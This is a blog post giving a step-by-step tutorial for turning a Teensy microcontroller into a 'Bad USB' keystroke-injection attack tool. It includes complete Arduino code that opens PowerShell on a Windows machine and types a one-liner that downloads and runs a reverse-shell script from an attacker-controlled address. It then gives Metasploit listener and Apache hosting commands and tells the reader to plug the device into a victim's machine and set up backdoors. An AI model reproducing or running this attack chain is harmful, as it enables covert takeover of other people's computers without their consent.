Open in app

Sign in

Write

Sign in

BAD USB using TEENSY

Sharan Raj
iQube
Published in
4 min readJun 4, 2019

As I have watched many movies and series, most hackers perform their attacks via USB. The victims just plug in the USB and their systems will be compromised just like that.

So exploring how to perform this attack. I googled about this and found out about this good thing.

BAD USB’s:

Most common USB flash drives are exploitable due to the “BadUSB” vulnerability. This allows us, hackers, to reprogram the microcontroller in them to act as a human interface device (HID), e.g., a keyboard, and perform custom keystrokes on our target machine. The hackers program it or upload their desired code into the USB. Once the USB is plugged into the victim’s machine it executes the code.

The working of this will be like:
https://youtu.be/sbKN8FhGnqg

But it costs so much for everyone to afford it :-/
While searching for an alternate way I found out about this:

Teensy USB Development Board

The Teensy is a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects.

{reference link: https://www.pjrc.com/teensy/}
This just cost a few bucks rather than comparing to these Bad USB.

Now we’ll proceed on making our bad USB <:-}

Setting up:

  1. Teensy USB (version 3.0+)
  2. Kali Linux (maybe in VM)
  3. Arduino IDE

Configuring the setup:

1.Arduino IDE

Download and Install Arduino IDE for compiling the code we will be working on.

2. Setting up Teensy USB on IDE

Download the setup for windows from:-https://www.pjrc.com/teensy/td_146/TeensyduinoInstall.exe
{for other platforms:- https://www.pjrc.com/teensy/td_download.html} and install the the setup.

Now go into your IDE and configure the tool

3. Coding:

code:
#include <paensy.h>
#include <Keyboard.h>
int ds = 500;

void setup() {

// Configure the delay that everything else scales off of.
SetDelay(200);
// Configure the delay that the Morse code uses.
SetMorseDelay(250);

// Perform an initial delay to give the USB time to prepare.
PerformInitDelay();

// LED pin number, 13 for 3.1
// 11 for 2 and 2.x
SetLEDPin(13);
// Put the pin into output mode
pinMode(LED_PIN, OUTPUT);
// Turn on the LED pin so we know the device is running.
digitalWrite(LED_PIN, HIGH);
delay(100);
// Run

Keyboard.set_modifier(MODIFIERKEY_GUI);//windows button
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
Keyboard.print(“powershell”);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);

// Modify 127.0.0.1 with your IP address and with your file

Keyboard.print(“IEX (New-Object Net.WebClient).DownloadString(‘http://10.1.75.77/ShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.1.75.77 -Port 9898”);

Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);

Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);

Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.set_key1(KEY_D);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1000);
}

void loop()
{
// blink quickly when complete
digitalWrite(LED_PIN, HIGH);
delay(ds/2);
digitalWrite(LED_PIN, LOW);
delay(ds/2);
}

You can change the keyboard layout (key names) according to your victim’s machine.
Now as the code is ready we should compile it and upload it into our Teensy.

4.Setting up our Listener

Kali Linux Terminal

Open up your terminal and type the following:

>msfconsole
>use exploit/multi/handler
>set payload windows/x64/shell reverse_tcp
>set lhost <your ip>
>set lport <the port you are listening>
>run

Remember the IP & Port addresses in the teensy code and in your listener should be the same.

5. Setting up the exploit :
As we can the teensy code is downloading the file from a link and executing it. So we need a server hosting the file.
In your Kali Linux, you have to set up a server to feed that file.
Follow these commands:

>sudo apt-get install apache2
>service apache2 start

Download the file from here: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

now do the following commands:

>mv Invoke-PowerShellTcp.ps1 ShellTcp.ps1
>cp ShellTcp.ps1 /var/www/html/

Finishing up

Now plug in the Teensy USB in the victim’s machine. As soon as it is plugged in, the keystrokes start to work which finally results in getting the reverse shell of the victim’s machine.
Now as you have got the reverse shell in the Metasploit you can change the payload and use it, by making backdoors and other stuff.

Arduino
Badusb
Cybersecurity
Hacking

--

--

Sharan Raj
iQube

Written by Sharan Raj

15 Followers
Writer for

I might not be where I want to be yet but I get closer everyday

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams